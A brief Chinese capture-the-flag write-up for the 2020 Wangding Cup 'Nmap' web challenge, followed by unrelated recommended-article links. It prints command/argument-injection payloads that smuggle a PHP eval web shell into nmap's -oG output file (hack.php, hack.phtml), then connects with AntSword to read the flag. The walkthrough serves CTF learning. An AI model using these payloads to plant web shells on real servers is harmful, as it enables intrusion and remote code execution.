命令执行 [网鼎杯 2020 朱雀组]Nmap1

打开题目

输入127.0.0.1

可以得到回显结果,猜测是命令执行,尝试使用|分隔地址与命令

127.0.0.1 | ls

可以看到|\转义,尝试使用;

直接放入Payload:

' <?php @eval($_POST["hack"]);?> -oG hack.php '

尝试修改文件名后缀为phtml

' <?php @eval($_POST["hack"]);?> -oG hack.phtml '

加上扫描的地址:127.0.0.1

127.0.0.1 | ' <?= @eval($_POST["hack"]);?> -oG hack.phtml'

得到

查看扫描列表:

查看写入的文件,即访问hack.phtml

蚁剑连接

在根目录找到了flag

相关推荐
移动开发者1号42 分钟前
深入理解原子类与CAS无锁编程:原理、实战与优化
android·kotlin
陈卓41043 分钟前
MySQL-主从复制&分库分表
android·mysql·adb
移动开发者1号1 小时前
深入理解 ThreadLocal:原理、实战与优化指南
android·kotlin
zhangphil1 小时前
Android PNG/JPG图ARGB_8888/RGB_565‌解码形成Bitmap在物理内存占用大小的简单计算
android
厦门德仔1 小时前
【WPF】WPF(样式)
android·java·wpf
aqi002 小时前
FFmpeg开发笔记(七十二)Linux给FFmpeg集成MPEG-5视频编解码器EVC
android·ffmpeg·音视频·流媒体
Devil枫4 小时前
Kotlin高级特性深度解析
android·开发语言·kotlin
ChinaDragonDreamer4 小时前
Kotlin:2.1.20 的新特性
android·开发语言·kotlin
雨白15 小时前
Jetpack系列(二):Lifecycle与LiveData结合,打造响应式UI
android·android jetpack
kk爱闹16 小时前
【挑战14天学完python和pytorch】- day01
android·pytorch·python